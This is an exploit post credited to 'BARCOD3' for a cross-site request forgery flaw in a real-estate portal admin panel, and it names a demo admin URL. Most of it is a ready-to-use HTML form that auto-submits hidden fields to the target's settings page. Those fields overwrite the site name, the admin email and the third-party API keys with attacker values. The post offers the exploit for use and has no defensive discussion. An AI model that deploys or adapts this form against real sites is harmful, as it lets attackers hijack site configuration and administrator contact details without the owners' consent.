< ------------------- header data start ------------------- >
#############################################################
# Application Name : RealEstate Software
# Demo : http://demo.realestateportalsoftware.com/admin/
# Vulnerable Type : XSRF
# Infection : site informations can change
# Author : BARCOD3
#############################################################
< ------------------- header data end of ------------------- >
<h1>BARCOD3</h>
<form method=POST action=[target.com]/settings>
<input type=hidden name=site_name value=STEALTHISEVIL size=50>
<input type=hidden name=admin_email value=EVIL size=50>
<input type=hidden name=education_key value=EVIL size=50>
<input type=hidden name=zillow_key value=EVIL size=50>
<input type=hidden name=seo_desc value=STEAL size=50>
<input type=submit name=update_settings value=update>
</form>
< -- bug code end of -- >